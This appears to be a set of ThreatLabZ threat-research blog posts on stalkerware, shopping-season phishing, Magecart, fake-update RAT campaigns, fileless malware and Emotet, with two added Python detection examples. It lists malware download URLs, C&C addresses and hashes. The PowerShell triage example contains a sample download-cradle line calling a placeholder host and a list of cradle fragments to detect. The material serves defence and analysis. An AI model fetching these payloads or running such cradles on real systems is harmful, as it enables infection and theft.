On its official website, Auto Forward assures users that the spyware works on both Android and iOS platforms.
Once installed, it steals the personal data of the victim and forwards it to its server, where the attacker can easily view stolen data such as text messages, WhatsApp activities, GPS locations, photos, a list of installed apps, and so on.
Conclusion
Spyware apps often portray themselves as parental-control apps or apps that can monitor employee whereabouts or the activities of a spouse suspected of cheating. Although there are legitimate uses, such as parents monitoring their children's location, these types of apps are often used maliciously.
Most of the spyware in this report was not properly designed. It stores stolen data on a server without any security, which creates a single point of failure: a single compromise of that server can leak every victim's data into the wild.
Secondly, we observed the stolen data being transferred to C&C servers over plain-text channels, which can be compromised by man-in-the-middle attacks.
These flaws would not be acceptable with any legitimate app because they threaten the privacy of the users, potentially revealing their personally identifiable information (PII), which is obviously not a concern to the attackers.
Smartphone users who suspect their privacy may have been compromised by such apps can consider following these steps:
Use a legitimate antivirus app that is regularly updated
Try factory-resetting your device
Remove suspicious apps from the device administrator list (Settings --> Security --> Device administrators)
Zscaler customers are protected from stalkerware apps.
IOCs
Hash
97c6c8b961d57d4ebad47f5c63ec6446
b0e68b66a5ba47612f2a6a33b343503b
93e969ea1118a9d00be7f1c74b50fce9
b44a98af29b021ad5df4ac6cc38fecf5
d4ecbf666d17326deab49f75588e08b3
9eaf38020f898073af1a3ce34226c91f
ea1546f34a6cd517dcfec07861b7fb4f
5fbb1b497c5a86815e5e8cc092d09af0
10322c7dea57269d69a85699e0357f5f
3b388138584ad3168e745097d5aa4206
369a17a8e1031101f41cc31caac56b9c
ba63ae94bdec93abc144f3b628d151ad
8dab7a558f91e72e3edae8e20ee55c86
001209b1e2760f88f2bb4b68f159a473
33dcfd84589c6ccf00fa5a302cefd0fe
66dbd2d7614555440b657ae24527034a
URLs
russ[.]city/apks/alltracker_thief_v.6.5.2.apk
russ[.]city/apks/systeminfo_v.6.5.2.apk
russ[.]city/apks/systemupdater_v.6.5.2.apk
206.41.116[.]121
dwn[.]vys.me
Scamming and Smishing while Shopping
A few weeks ago, the witches and skeletons that decorated shop windows for Halloween were swept aside and replaced with reindeer and jolly elves. Fir trees supplanted the pumpkins and “Jingle Bells” began drifting from speakers buried under mounds of artificial snow. It all means one thing: the start of the holiday shopping season, which kicks into high gear on Black Friday.
Cyber Monday, which began in 2005, has surpassed Black Friday as the biggest shopping day of the year and, not surprisingly, it has become a major target for cybercrime. But in a report our ThreatLabZ researchers did last year, we were somewhat surprised to see the shifting volumes of activity, which spiked a week before Cyber Monday and dropped off significantly on the day itself. We saw this as an example of the increasing sophistication of attack campaigns, as those carrying them out had begun to mirror the strategies of retail marketers.
The Zscaler cloud processes about 75 billion transactions a day for our enterprise customers, and though the bulk of the traffic is business-related, the sheer volume gives us a sweeping view of activity across the internet. Since the beginning of November, we have seen a marked increase in what we identify as shopping traffic. We are also seeing activity that could foreshadow a busy holiday season for cybercriminals. This activity includes phishing that’s targeting well-known shopping brands, phishing attacks targeting mobile phones, site skimmers looking to harvest credentials from compromised e-stores, scam sites offering gift cards, and banking Trojans trying to turn your PC or mobile device into an ATM.
Figure 1: Shopping traffic on the Zscaler cloud between Oct. 21 and Nov. 17, 2019, averaging nearly 600 million transactions per weekday
Phishing activity tends to rise when the shopping season begins, as attackers know that shoppers may be more likely to respond to “special offers” or notifications relating to shipping and similar matters. Threat actors adjust their phishing kits accordingly, sometimes with seasonal messages and designs. We calculated an increase of more than 400 percent in phishing activity between the first 14 days of October and the first 13 days of November.
Figure 2: Phishing activity between Oct. 2 and Oct. 14, 2019
Figure 3: Phishing activity between Nov. 2 and Nov. 14, 2019
Three cases of phishing attacks on shoppers
Because Amazon is by far the busiest shopping site, it has the highest likelihood of being on the radar of scammers looking to attack a broad audience. Below, we'll discuss some of the ways that attackers are leveraging Amazon’s popularity for their own money-making schemes.
Case 1: Fake Amazon Gift Cards
Everyone loves giving and receiving gift cards, but the phony versions being generated by scammers are dangerous. If you were to click the link (as shown below), you would be redirected to a phishing page that will attempt to collect your login credentials.
The following scam arrives via email, congratulating the recipient for qualifying to receive a reward for taking an anonymous survey—but, it says, it must be done in five minutes.
Figure 4: Phishing attempt
Figure 4a: HTML of the page shows the attempt to pose as an Amazon Gift Card
Case 2: Fake Amazon Login
A common way that attackers try to compromise your Amazon account is through the use of an email or site posing as a legitimate Amazon site. Be wary of any emails posing as Amazon Customer Service alerts or payment invoices as these are common hooks attackers will use to appear legitimate and get victims to click their links. ThreatLabZ has been monitoring one campaign that was sending PDF or DOC files to victims in the hopes they would click through and enter their credentials (see the image below).
Figure 5: Letter impersonating Amazon in an attempt to capture user credentials
By clicking the link in the letter, you would be redirected through several URL shorteners before eventually landing on a compromised site hosting an “Amazon” phishing kit. The site was down at the time of this publication, but the screenshot from early on in the campaign shows a near-perfect copy of an Amazon login screen that is set up to steal credentials.
Figure 6: Faked Amazon login screen
Case 3: Emotet Trojan
A popular method that attackers use to target victims is through the use of scam emails or URLs that pretend to be legitimate purchase orders or invoices; these may appear as links or attachments. This has become a common method for distributing one of the most prevalent banking trojans out there, Emotet. The following case actually comes from the site: http://phamthaifood[.]com/4ib60l/Amazon/Orders-details/10_19/.
Opening this document in a secured environment still asks the user to enable editing to allow the attack to commence.
Figure 7: Allowing active content of suspicious files is not recommended
An analysis of the document in question provides a glimpse into the PowerShell that will execute on the victim's system.
Figure 7a: Malicious PowerShell
The PowerShell shown above downloads and executes the Emotet trojan. Running the document through dynamic analysis confirms the malicious behavior.
Figure 7b: Threat score of Emotet as identified by Zscaler Cloud Sandbox
Once the document is opened, it will execute encrypted PowerShell commands to install the banking trojan onto the victim’s system. We've written extensively about the resurgence of the Emotet malware in earlier blogs.
PayPal Phishing
In addition to shopping sites, banking and personal finance sites, such as PayPal, become frequent targets during the holidays. PayPal is one of the most widely accepted secure payment options used by vendors. Threat actors know this and use it as another primary target for phishing attacks. Some of these attacks are easy to recognize (as shown below) because they are served over non-secure connections using HTTP, which is always a tell-tale sign of a phishing attempt.
Figure 8: Faked PayPal login screen
Some attacks, on the other hand, can be quite elaborate, as shown below. They are served over an HTTPS connection and the interface presents a very good reproduction of the official PayPal site. The domain name (paypal.com.hrmy.mtbank[.]shnpoc[.]net) could easily be missed because many people believe that as long as they see “paypal.com,” the site is legitimate. Particularly when viewed on a mobile device, it would be difficult to see that the URL does not belong to PayPal, but “shnpoc.net.”
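A defender-side check for the lookalike pattern just described, written for this page as an added example and not taken from the Zscaler post: it refangs the "[.]" and "(.)" notation the post uses, reduces a hostname to its registrable domain using a constructed stand-in for the Public Suffix List, flags a watched brand name that appears anywhere other than as the registrable domain itself, and separately flags login pages served over plain HTTP. The suffix table and the brand watch list are assumptions made for illustration.

```python
"""Flag brand-lookalike hostnames such as paypal.com.hrmy.mtbank[.]shnpoc[.]net.

Added example; not code from the Zscaler post. Handles the defanged
notation ("[.]", "(.)", "hxxp") used in threat reports so indicators can be
pasted in as printed.
"""
import re
from urllib.parse import urlsplit

# Constructed stand-in for the Public Suffix List (publicsuffix.org); a real
# deployment loads the full list so multi-label suffixes like "co.uk" resolve.
PUBLIC_SUFFIXES = {"com", "net", "org", "xyz", "co.uk", "com.br"}

# Constructed watch list: registrable domain -> brand name.
WATCHED_BRANDS = {"paypal.com": "PayPal", "amazon.com": "Amazon"}


def refang(indicator: str) -> str:
    """Undo common defanging so the indicator can be parsed as a URL."""
    out = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", indicator)
    # "hxxp://" and "hxxps://" both become their real scheme.
    out = re.sub(r"^hxxp", "http", out, flags=re.IGNORECASE)
    return out


def registrable_domain(hostname: str) -> str:
    """Return the eTLD+1 ("shnpoc.net") for a hostname, or the host itself if no suffix matches."""
    labels = hostname.lower().rstrip(".").split(".")
    # Walk from the longest candidate suffix to the shortest, so "co.uk" wins over "uk".
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return hostname.lower()


def inspect_url(url: str) -> dict:
    """Return the parsed host, its registrable domain and a list of findings."""
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    base = registrable_domain(host)
    findings = []
    if parts.scheme == "http":
        findings.append("served over plain HTTP")
    for brand_domain, brand in WATCHED_BRANDS.items():
        if base == brand_domain:
            continue  # the brand's own site
        # "paypal.com" buried in a subdomain, or "paypal" anywhere in the name
        if brand_domain in host or brand.lower() in host:
            findings.append(f"{brand} appears in a hostname whose registrable domain is {base}")
    return {"host": host, "registrable_domain": base, "findings": findings}


if __name__ == "__main__":
    for sample in ("https://paypal.com.hrmy.mtbank[.]shnpoc[.]net/signin",
                   "hxxp://cyzoone(.)xyz/poll",
                   "https://www.paypal.com/signin"):
        print(inspect_url(sample))
```

The mobile-screen problem the paragraph raises is exactly why the check keys on the registrable domain rather than on whether "paypal.com" appears in the string: the brand name is still reported, but only when it is not the domain that actually owns the page.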
Figure 9: Faked PayPal login screen
The example below appears to be a PayPal site that enables you to sign up for a personal or business account, or even recover your password. But any personal and financial information you enter will be captured by the scammers.
Figure 10: Faked PayPal registration screen
Smishing Campaign
Many consumers are seeing an increase in order and delivery notifications on their mobile devices. Scammers exploit this to lure users into revealing personal information through SMS phishing ("smishing"). With smishing, attackers send mobile users text messages containing live links that, when clicked, redirect the user to phishing pages, resulting in credential theft and potentially financial loss. In the example shown below, we saw SMS messages notifying the user of an online order, with a link to follow for more details.
Figure 11: Smishing attempt
Once clicked, the user is redirected to cyzoone(.)xyz. This site poses as a poll site to lure victims into entering to win up to $35,000. To take part in the poll, victims have to register using their names.
Figure 12: Smishing attempt using a survey with cash prize
Upon clicking the PARTICIPATE button, the site begins asking poll questions. The questions we observed were about cars, perfumes, and watches, among other things, and can be observed in the following screenshots.
Figure 13: Smishing attempt using a survey with cash prize
Once finished with the poll questions, the screen shows the amount that the victim has “won.” Now that the user is fully invested in this deception, the scam starts. The attacker claims, due to payment system limits, that the payment will be sent in two parts. But, to get that amount in full, the user has to pay $35, as shown in the following screenshot.
Figure 14: Scam message saying if you pay $35, you will receive $26,600
Upon clicking the payment button, the scam redirects to a payment page hosted on paybank(.)expert asking the user for a credit card number, CVV number, and the expiration date of the card.
Figure 15: Payment screen as part of a smishing scam
After filling out the form and clicking the Pay Now button, the payment information will be sent to the attacker’s site, as shown in the below screenshot. This gives the attackers access to the victim’s account.
Figure 16: Scammer’s site
We also checked on the stats of the bit.ly link included in the original SMS message and observed that there were more than half a million clicks on this link in a 24-hour period, which shows the widespread reach of this scam.
Figure 17: Clicks on the scammer’s original smishing message
Magecart: Site skimmer
Magecart has been active for five years and has successfully injected JavaScript into target websites to skim payment information from point-of-sale portals. The injected script can be loaded directly onto the target page or loaded from a remote resource controlled by the attacker. The attack script may be injected in plain text (as shown below) or obfuscated to avoid detection.
Figure 18: E-commerce site compromised by Magecart
Magecart malware is capable of tracking cookies to check what data is stored and what data is sent. It also checks the validity of the payment details entered by a user. If the payment details are valid, the malware proceeds to send the information to the attacker. The skimmer also keeps track of card details it has already captured and sends only new information to the attacker. For more detailed insight into the mechanics of Magecart, please check out our analysis here.
Figure 19: Magecart skimmer
Conclusion
The ThreatLabZ team at Zscaler will continue to track and block various campaigns and tools used by threat actors to target users. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves by reviewing our security checklist, particularly during the shopping season:
Verify the authenticity of the URL or website before accessing it. Be wary of links with typos.
Check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites. All legitimate vendors/retailers and payment portals use HTTPS connections for their transactions.
Enable two-factor authentication, or “2FA,” to provide an additional layer of security, especially for sensitive accounts related to financial transactions.
As a rule of thumb, don't click links or open documents from unknown parties who promise exciting offers and opportunities.
Avoid visiting URL shortener links.
Always ensure that your operating system and web browser are up to date and have the latest security patches installed.
Use a browser add-on, such as Adblock Plus, to block malvertising (compromised or malicious websites bombard visitors with pop-up ads).
Only download apps from official app stores, such as Google or Apple.
Avoid using public or unsecured Wi-Fi connections for shopping.
Back up your documents and media files. You can always go the extra mile by encrypting your files.
Review helpful instructions by the Federal Trade Commission (FTC) on Identity Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware.
Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message.
Report incidents to the FTC.
Categories: Security Posts
NetSupport RAT installed via fake update notices
Recently, the Zscaler ThreatLabZ team came across two campaigns designed to trick users into downloading a Remote Access Trojan (RAT) via a fake Flash Player update and a font update. These campaigns are designed to inject malicious redirector scripts into compromised content management system (CMS) sites. These sites use popular programs, such as WordPress, Joomla, Drupal, and others, and are being attacked as a result of vulnerabilities introduced by plugins, themes, and extensions, something we’ve discussed previously on this blog. The two malware campaigns we examine in this blog deliver a payload designed to steal sensitive information.
The following figure depicts the hits on the various compromised sites. Overall, Zscaler has blocked nearly 40,000 of these attempts in the past three months.
Figure 1: The number of hits on the various types of compromised CMS sites: WordPress (green), Joomla (gold), Drupal (blue), and other CMS sites (orange)
Method 1: Fake Flash Player update campaign
In this attack, cybercriminals compromised WordPress sites through a vulnerable theme plugin and injected two malicious redirect scripts into each site. Either script leads to malware being deployed on the visitor's machine: the injected script redirects to the malware site and downloads a fake-update template script, which displays a fake Flash Player update alert over the compromised site.
Figure 2: A compromised WordPress site with the fake Flash Player update page
The following figure shows the source code of the compromised website with the injected scripts.
Figure 3: The injected redirector scripts in a compromised CMS site
The first injected script will direct the user to click.clickanalytics208[.]com to download the fake update template. If it fails to meet the attacker's checkpoints, such as geolocation and network settings, then it will execute the next injected script.
Figure 4: The first injected malicious script redirects to the click.clickanalytics208[.]com site
The second injected script will redirect to the chrom-update[.]online site and will download the fake update template script from the malicious site.
Figure 5: The second injected malicious script redirects to the chrom-update[.]online site
The attacker serves the template.js file, which draws the fake update page as a layer over the compromised site. Which fake-update template is displayed depends on the value of a variable called the "banner."
Figure 6: The default template.js code [banner value = 1: browser update; 2: font; 3: Flash]
The fake template page will display an alert to try to trick the user into starting the update. Once the user clicks the "Update" button, the script downloads the malicious HTA file from the specified URL.
Figure 7: A fake Flash Player update page with the link to download malicious HTA file
If the user clicks the "Later" button, the redirect still occurs, taking the user to the same page to download the malicious HTA file. The following figure depicts the source code of the template.js with the link to download the malicious HTA file with the banner value 3.
Figure 8: The source code of the template.js script from the redirection URL (chrome-update[.]online)
Once the user runs the HTA file, it launches PowerShell through the command prompt, and PowerShell downloads the RAT payload from the specified URL.
Figure 9: The source code of the downloaded malicious HTA file
Figure 10: The obfuscated content responsible for the malware download
Figure 11: The deobfuscated code showing the download link
Figure 12: Step 1 of the malware payload installation process
Figure 13: Step 2 of the malware payload installation process
Figure 14: The NetSupport RAT malware running as a client-side application
Finally, the installed RAT malware will send the victim's information in an encrypted format to the attacker’s site (hxxp://179.43.146[.]90/fakeurl.htm) to enable remote access of the victim’s machine, as shown in Figure 15 below.
Figure 15: The captured user data is transferred to the attacker’s site in an encrypted format
Figure 16: The overall traffic of the fake Flash Player update malware campaign
The attackers were also tracking the visitor count, as shown in Figure 17 below. At the time of writing, 113,000 unique users had been affected by this campaign.
Figure 17: The affected user count
Method 2: Fake font update campaign
In this attack, the cybercriminals inject the fake-update template script directly into the compromised legitimate site, which helps the campaign evade detection. As mentioned earlier, the template script's logic identifies which browser is being used.
While accessing the compromised site via Chrome, the user will receive an alert that the “PT Sans” font wasn’t found.
Figure 18: The compromised site with a fake font update page (Chrome)
The same site was accessed via Firefox and shows the same alert to the user in the Firefox template.
Figure 19: A compromised site with a fake font update page (Firefox)
The following image shows the source code of the compromised site with the injected template script.
Figure 20: The template.js is injected directly into the compromised site
The source code of the template.js script shows a banner value “2” and has a link (sreex[.]info/update.exe) to download the malware payload.
Figure 21: The source code of the template.js script with the malware download link
Figure 22: After clicking the update button, the malware payload will be downloaded (via update.exe)
The following activities were observed while executing the downloaded Trojan.
Figure 23: The program created a process “gdsun.exe” from the malware payload (a self-copy of the payload)
Figure 24: The malware creates a copy of the payload in the %ProgramData%/ folder
Figure 25: It also creates a startup registry entry for the dropped malware
It posts the collected user data to clickies(.)site/CC/index(.)php, a site operated by the attackers.
Figure 26: Post-infection callback traffic
Figure 27: The overall traffic of the fake font update campaign
Conclusion
In today's digital world, a company's website is its most valuable asset. Therefore, it is critically important for companies to protect this public face from an attack that could put their business, employees, and customers at risk. Zscaler has blocked more than 40,000 malicious attacks related to this campaign in the past three months.
Figure 28: The Zscaler Risk Analyzer score for the malware payload download URL
IOCs
URLs:
click.clickanalytics208(.)com
chrom-update(.)online
asasasqwqq(.)xyz
bitbucket(.)org/execuseme1/1312/downloads/download.hta
xyxyxyxyxy(.)xyz/wwwwqwe/11223344.exe
179(.)43(.)146(.)90/fakeurl(.)htm
sygicstyle(.)xyz
sreex(.)info/update(.)exe
clickies(.)site/CC/index(.)php
Malware payload:
5ad69da64dacdf87c5bdea12a20ca8fd4d34e6a16c37dfbb9a2af8df79901504 (download.hta)
9c69a1d81133bc9d87f28856245fbd95bd0853a3cfd92dc3ed485b395e5f1ba0 (11223344.exe)
ea137c0079624de8d2f8b174d44f90faa58c4eda558f7d5db0efa742f36c2cdf (update.exe)
Fileless malware campaign roundup
Criminals frequently get caught because they leave evidence at the scene of the crime—fingerprints, DNA, and the like. Cybercriminals are no different, often leaving files behind on the systems they infect.
In an effort to reduce the evidence left behind after an attack, cybercriminals developed fileless malware: malicious code that exists only as an artifact in system memory. In short, the infection does not write any executable files to the infected system's hard drive.
By leaving few traces behind, malware authors try to postpone detection by security vendors for as long as possible.
During the past few years, fileless infection has been adopted by numerous forms of malware and advanced persistent threats (APTs). These fileless infection chains can employ multiple techniques to deliver the final payload. In one example, the Kovter Trojan stored its payload in the Windows registry. The Hancitor Trojan wrote its payload into a hollowed process spawned by shellcode that a Word document macro injected into the Microsoft Word process.
Lately, we have been seeing an increase in fileless infection techniques that leverage legitimate applications already present on the victim's machine. These techniques do not rely on storing executable files and leave no direct traces on disk, making detection and removal a challenge. In this blog, we discuss recent malware campaigns that have used fileless infection mechanisms built on legitimate applications.
Figure 1: Stats showing hits of fileless infection chains
Case 1: njRat Backdoor
Although njRat has been around for a long time, we recently observed that this backdoor is being loaded by a fileless infection chain. A .docx file is received as an attachment in a phishing email by the victim. Once the .docx file is opened, the infection cycle begins.
Figure 2: The njRat payload loaded by fileless infection
The .docx file's "document.xml.rels" references a remote OLE object, which is a Rich Text Format (RTF) document exploiting CVE-2017-0199; that document in turn opens an embedded .doc file containing a Visual Basic for Applications (VBA) macro.
Figure 3: The .docx downloading an RTF file
The VBA macro contains an encoded PowerShell script. It downloads the VBScript from “www[.]m9c[.]net/uploads/15676549681.jpg.” The VBScript then decodes and executes the embedded PowerShell script. The PowerShell script then downloads the encrypted Portable Executable (PE) file from “www[.]m9c[.]net/uploads/15676547971.jpg,” which is the njRat executable.
Figure 4: The VBS PowerShell downloads an encoded PE file
This VBScript decrypts the PE file, a .NET executable that is loaded directly into memory and runs in the context of MSBuild.exe. No disk writes are observed, and the njRat backdoor executes silently, communicating with the CnC server "borapegar147[.]ddns[.]net".
Case 2: Sodinokibi Ransomware
The Sodinokibi ransomware (also known as REvil) is one of the most well-known ransomware families in the wild today. It has been on the rise since the threat group behind the GandCrab operation announced that it had shut down at the end of May. Recently, we have noticed that Sodinokibi has adopted a fileless mechanism.
Figure 5: The Sodinokibi payload loaded by a fileless infection
The fileless infection cycle starts when the victim clicks the BAT file that is received as an attachment in a phishing email. The BAT file contains a PowerShell script containing Base64 encoded expressions.
Figure 6: The BAT file received via MalSpam
As shown below in the decoded PowerShell script, this script downloads another PowerShell script of more than 3,000 lines, containing a Base64-encoded portable executable (PE) file, from a pastebin URL, loads it, and invokes a function that starts the attack in the system's memory.
Figure 7: The decoded PowerShell expressions
Figure 8: The encoded PE file in PowerShell downloaded from the pastebin
This script decodes and provides the PE file to a loader function, which takes care of injecting this file directly into the system's memory. The loaded PE file, which appears to be a DLL, is actually Sodinokibi ransomware. We see no traces of the DLL being saved on the disk as the ransomware silently starts encrypting files on the system.
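Both the Emotet maldoc described earlier (the encoded PowerShell that installs the banking trojan) and the Sodinokibi BAT file above hinge on PowerShell being launched with Base64-encoded expressions, which is something a process-creation log can surface. The following is an added detection example written for this page, not code from the Zscaler post: it decodes the `-EncodedCommand` argument (Base64 over UTF-16LE, the encoding PowerShell itself uses) from constructed command-line records and flags scripts containing download-cradle fragments. The log format, the fragment list and the sample lines are assumptions for illustration.

```python
"""Decode and triage PowerShell -EncodedCommand launches from process logs.

Added example; not code from the Zscaler post. The log lines below are
constructed stand-ins for Windows 4688 / Sysmon Event ID 1 command lines.
"""
import base64
import re

# Fragments typical of the download-and-execute cradles the post describes;
# extend to taste for your environment.
SUSPICIOUS_FRAGMENTS = (
    "downloadstring", "downloadfile", "invoke-expression", "iex",
    "frombase64string", "pastebin", "bitstransfer",
)

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc).
ENCODED_FLAG = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """PowerShell's own scheme: Base64 over UTF-16LE. Used here only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16LE: leave it for a different rule


def triage(log_lines):
    """Return (line_no, decoded_script, matched_fragments) for suspicious lines."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        script = decode_encoded_command(line)
        if script is None:
            continue
        lowered = script.lower()
        matched = [f for f in SUSPICIOUS_FRAGMENTS if f in lowered]
        if matched:
            hits.append((line_no, script, matched))
    return hits


# Constructed sample log; the cradle string is illustrative and the host is a reserved name.
CONSTRUCTED_LOG = [
    "4688 NewProcessName=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe /c dir",
    "4688 NewProcessName=powershell.exe CommandLine=powershell.exe -NoP -w hidden -enc "
    + encode_command("(New-Object Net.WebClient).DownloadString('http://paste.example.invalid/raw/x')"),
    "4688 NewProcessName=powershell.exe CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "4688 NewProcessName=powershell.exe CommandLine=powershell.exe -enc " + encode_command("Get-Date"),
]

if __name__ == "__main__":
    for line_no, script, matched in triage(CONSTRUCTED_LOG):
        print(f"line {line_no}: {matched} -> {script}")
```

Only the second constructed line is reported: the third uses `-ExecutionPolicy`, which the flag regex correctly does not treat as `-e`, and the fourth decodes to a harmless `Get-Date`, so decoding alone is not an alert; the fragment match is what separates the cradle from ordinary administrative use.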
Case 3: Astaroth Backdoor
The Astaroth Trojan is known for stealing credentials, keystrokes, and other system information. An analysis of the backdoor and the infection cycle is covered in detail by Microsoft. The infection chain starts with a victim clicking on an LNK file that is delivered via a phishing email. This LNK file contains an obfuscated WMIC command, which downloads an XSL file containing obfuscated JavaScript.
Figure 9: The obfuscated WMIC command
This JavaScript code downloads a Base64-encoded payload by abusing the Bitsadmin tool and decodes it using the Certutil tool. The payloads are XOR-encrypted PE files, except for one DLL, which is loaded via the Regsvr32 tool. Finally, this DLL decrypts the Astaroth backdoor payload and maps it into the Windows userinit process.
Figure 10: Obfuscated JavaScript in an XSL file
During the entire attack chain, only system utilities are leveraged to load the final payload. The Astaroth payload executes silently without traces on the filesystem.
The case studies described above are based on techniques that take advantage of legitimate applications, such as PowerShell and Windows Management Instrumentation (WMI). However, there are other techniques in which the payload is stored in the registry and delivered by taking advantage of zero-day vulnerabilities in applications or in the operating systems themselves. In one example, the famous Equifax breach used a vulnerability in Apache Struts to deliver the payload. As the PowerShell scripts were stored in the registry, there was no direct trace of the malware being stored.
Conclusion
Fileless infection campaigns are difficult to detect. That's why the Zscaler ThreatLabZ team continually monitors malware delivery mechanisms from several sources to ensure that Zscaler customers are protected.
Emotet is back in action after a short break
It’s common for cybercriminals to launch an attack, then shortly thereafter stop the campaign before they are detected. These breaks also give these bad actors a chance to change tactics to, once again, attempt to avoid detection. That’s what operators using the Emotet malware did, taking a short break before bringing Emotet back in a new, more dangerous form.
Emotet operators took about a two-month break as command and control (C&C) servers went down in late May and came back online around the end of August. Then, we began observing a new version of this malware around mid-September.
Emotet started as a banking trojan in 2014. However, it has morphed into a very prominent threat. Now, it is mostly used for spamming and downloading additional malware threats on a target system. Based on the unique sample count of malware threats seen by the Zscaler Cloud Sandbox, Emotet and its downloaders appear to be among the most prevalent threats in 2019, followed by banking trojans and loaders, such as TrickBot and Ursnif, remote-access trojans (RATs), and off-the-shelf password stealers, such as LokiBot and AZORult.
Emotet is modular by design, as it supports multiple modules for different tasks, such as stealing information, spamming, and more. It is also known to download and to be downloaded by other malware families, such as TrickBot and Ursnif. It has also been associated with the Ryuk ransomware.
Email conversation hijacking
This year, Emotet employed a new tactic of using stolen email content in spam campaigns. The hijacking of existing email threads can be very effective as recipients are tricked into believing that the email was sent by the other person in the email thread. This trust factor can lead to the victim opening the email (and attachment) and getting infected with Emotet, effectively making the infected system part of an Emotet botnet.
Figure 1: Emotet activity from the beginning of June 2019 to mid-September 2019.
Figure 2: The new Emotet campaign after the break.
New campaign, new document templates, and new botnets?
We observed the following new templates in spammed malicious documents (maldocs) during this new campaign.
Figures 3 and 4: New macro templates (Product Notice and Protected View)
Earlier, there were two Emotet botnets, known as Epoch 1 (E1) and Epoch 2 (E2), each using a unique RSA key to communicate with its C&C. After the break, we noticed three new RSA keys in use, which suggests that a botnet has split into multiple botnets. The earlier keys are no longer seen and only the three new keys are in use, which means the operators are reorganizing their botnet infrastructure.
Already existing RSA keys
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMPLgcO0RQdJg/LTgiku57nH4KcLwHCx
S0lbynOUhHhKjTnmENrMA2idUbK6hI0JRZtii9oJSlb3e5NZiCK+Qr/NB2u7ZNRc
hG87aibm0ndS9xKDRXcmWwaQkF0PFuOHpwIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+
0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ
Wcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB
-----END PUBLIC KEY-----
New RSA keys
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhALk+KlHgOKXm9eDkWu2yN9lanjwOm6W2
PV0tgr4msNVby2pOJ6S1MZQnQwxl7y6WWzT4kveAQhLmW8JB2M2PDOxZOgVMJH2C
AtkVW1p/P9jNJWVvjK9SmrbLdIeiKNtRfQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM426uN11n2LZDk/JiS93WIWG7fGCQmP
4h5yIJUxJwrjwtGVexCelD2WKrDw9sa/xKwmQKk3b2fUhwnHXjoSpR7pLaDo7pEc
iJB5y6hjbPyrSfL3Fxu74M2SAS0Arj3uAQIDAQAB
-----END PUBLIC KEY-----
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB
KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0
h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB
-----END PUBLIC KEY-----
Figure 5: Emotet RSA keys used before and after the break.
RSA1 and RSA2 were used before the break. In this new campaign, we saw Emotet using RSA3, RSA4, and RSA5. (1, 2, 3, 4, and 5 are assigned based on their first observation sequence in the wild).
Before the break, the two RSA keys didn't share any C&C infrastructure. In this new campaign, two sub-botnets are sharing some infrastructure (as shown in the following screenshots).
Figure 6: Emotet RSA keys and C&C infrastructure before the break.
Figure 7: RSA keys and C&C infrastructure of the new Emotet campaign.
If we check the overall C&C infrastructure and RSA key relationships before and after the break, we can clearly see a reorganization of the C&C infrastructure, which is now divided among three new Epochs. One Epoch is divided into two while the other one is used to create a single botnet with some new C&Cs.
Figure 8: The Emotet RSA key and C&C infrastructure relationships before and after the break.
Emotet Downloader payload - Technical analysis
The Emotet infection cycle generally starts with spam emails containing malicious macro documents that drop a JavaScript file. This JavaScript file further downloads the Emotet payload from a compromised WordPress website. Almost all the samples we observed were served from compromised WordPress websites (mostly version 5.2.3).
We will take a look at one such malicious document for the purpose of analysis here:
MD5 – 359696113a2156617c28d4f79cc7d44b (“file 20190924 LTR6051.doc”)
The macro in the documents is quite simple and straightforward but contains lots of junk.
Figure 9: Macro code containing junk instructions.
After removing the junk, this is how the macro code looks.
Figure 10: Cleaned macro code.
It gets its text from TextBox1 in UserForm2, then saves that in a "JS" file before executing that file.
Figure 11: A user form containing JavaScript code.
This JavaScript file is heavily obfuscated, and more obfuscation is being added to the "JS" code incrementally. In earlier versions of this downloader, some of the strings and function names were readable; now almost every string is obfuscated.
Figure 12: Heavily obfuscated script
This script contains an array of strings in the variable "a." First, the elements of the array are shuffled by an anonymous function immediately after the array definition. Then there is a function "b," which decrypts strings and is used extensively throughout the script. By hooking this function, we can log each decrypted string just before it is returned. Some of the interesting strings include:
\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))
while (true) {}
return (function()
{}.constructor("return this")( )
4|0|7|5|3|1|8|2|6
2|1|0|6|3|5|4
split
debug
error
exception
trace
http://thewomentour.com/wp-includes/f8yezb9/
